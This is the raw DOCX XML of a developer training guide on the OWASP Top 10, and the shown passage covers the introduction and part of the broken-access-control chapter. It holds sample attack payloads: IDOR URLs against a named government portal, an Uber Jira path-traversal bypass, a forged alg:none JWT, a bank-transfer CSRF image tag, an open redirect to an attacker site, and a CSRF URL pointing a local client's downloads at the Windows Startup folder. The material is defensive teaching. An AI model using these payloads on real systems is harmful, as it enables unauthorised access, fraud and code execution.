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WEB APPLICATION SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Developer Training Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on OWASP Top 10 (2021)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About This Guide</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">This training guide is designed for developers at the beginner to intermediate level who build web applications. It covers the ten most critical web application security risks as defined by OWASP, with practical explanations, real-world attack examples, code samples, and actionable defence strategies.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Source material: “Atakowanie i Ochrona Webaplikacji” — Kuba Orlik, niebezpiecznik.pl (March 2026)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Standard: OWASP Top 10 — 2021 Edition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Coverage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Topics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A01 through A10 (2021)</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Target Audience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developers, beginner to intermediate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Theory, attack examples, prevention, code samples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Tools Referenced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Burp Suite, OWASP Dirbuster, SQLMap, jwt.io</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Introduction to Web Application Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Web applications are among the most common attack surfaces in modern software. Attackers continuously probe applications for vulnerabilities that can lead to data breaches, account takeovers, financial fraud, and full system compromise. Understanding how attacks work is the foundation for writing secure code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">What is OWASP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Open Web Application Security Project (OWASP) is a non-profit foundation that works to improve software security. Their flagship resource, the OWASP Top 10, is a consensus-based list of the ten most critical web application security risks, updated periodically to reflect the current threat landscape. The 2021 edition is the most current major release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Top 10 at a Glance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Vulnerability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A01:2021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Access Control</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A02:2021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Cryptographic Failures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A03:2021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Injection (SQL Injection, XSS)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A04:2021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Insecure Design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A05:2021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Misconfiguration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A06:2021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Vulnerable and Outdated Components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A07:2021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Identification and Authentication Failures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A08:2021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and Data Integrity Failures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A09:2021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Logging and Monitoring Failures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A10:2021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Request Forgery (SSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Use This Guide</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Each chapter covers one OWASP category and follows the same structure:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Overview — What the vulnerability is and why it matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">How It Works — Attack mechanisms and example scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection — How attackers (and testers) find the vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prevention — Specific countermeasures developers should implement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Code Examples — Vulnerable vs. secure code side by side</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Takeaways — Quick-reference summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">A01:2021 — Broken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Breach / Privilege Escalation</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Access control enforces that users can only perform actions or view data they are authorised to. Broken Access Control means these restrictions are not properly enforced, allowing attackers to act as other users, access unauthorised data, or gain elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In 2021, this moved to #1 on the OWASP list, present in 94% of tested applications. It represents a category of vulnerabilities rather than a single flaw.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Attack Patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure Direct Object Reference (IDOR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IDOR occurs when an application uses user-controllable input to access objects directly without verifying authorisation. A classic example is a URL-based object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Example: IDOR via URL parameter</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Vulnerable: User can change the ID to access other users' data</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/user/profile?id=1001</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/user/profile?id=1002  &lt;-- attacker changes this</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Real-world example seen in Polish government portal:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">https://moj.gov.pl/nforms/engine/ng/index?xFormsAppName=MojeDaneWRDP#/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">application-details/1000000000123</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Changing the trailing number reveals other citizens' data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Path Traversal / Access Control Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Some applications block direct access to admin URLs but fail to handle crafted paths. Uber's internal Jira instance was once accessed via a path-traversal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Example: Path traversal bypass</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Bypassing access control with path traversal</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">https://jira.uberinternal.com/status/..;/secure/Dashboard.jspa</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># The ..;/ sequence tricks the servlet container into processing</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># the request as if it came from /status/ while routing to /secure/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT-Based Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON Web Tokens (JWTs) are widely used for authentication. Several critical JWT vulnerabilities allow privilege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JWT Structure</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">A JWT consists of three Base64URL-encoded parts separated by dots:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Header.Payload.Signature</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Header: { "alg": "HS256", "typ": "JWT" }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload: { "sub": "1234567890", "role": "user", "exp": 1700000000 }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Signature: HMACSHA256(base64(header) + "." + base64(payload), secret)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack 1: Algorithm confusion (alg: none). The JWT spec requires implementations to support the 'none' algorithm, which disables signature verification. An attacker can strip the signature and set alg to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JWT alg:none attack</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Original token</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoidXNlciJ9.SIG</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Forged token with alg:none and escalated role</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJyb2xlIjoiYWRtaW4ifQ.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">#                                     ^^^^^^^^^^^^^ role changed to admin</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Note: no signature (empty after final dot)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack 2: RS256 to HS256 confusion (CVE-2018-0114, node-jose). Some libraries support both asymmetric (RS256) and symmetric (HS256) algorithms. An attacker can take the public key and use it as an HMAC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Algorithm confusion attack</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># If server uses RS256 but accepts HS256:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Attacker signs token with public_key as HMAC secret</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Server verifies with the same public_key -- succeeds unexpectedly</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Request Forgery (CSRF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF tricks an authenticated user's browser into making unintended requests to a web application. If the app relies solely on cookies for authentication without CSRF tokens, any website can forge requests on behalf of the victim.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CSRF examples</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;!-- Attacker page: victim visits and is logged into bank.com --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;img src="https://bank.com/transfer?to=attacker&amp;amount=1000" /&gt;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Open redirect leading to phishing --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">https://bank.com/login/?redirect=https://attacker-site.com/</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Cross-Zone CSRF: attacking localhost services via browser --&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">http://localhost:14774/gui/?action=setsetting&amp;s=dir_completed_download</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&amp;v=C:\Users\All Users\Start Menu\Programs\Startup</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
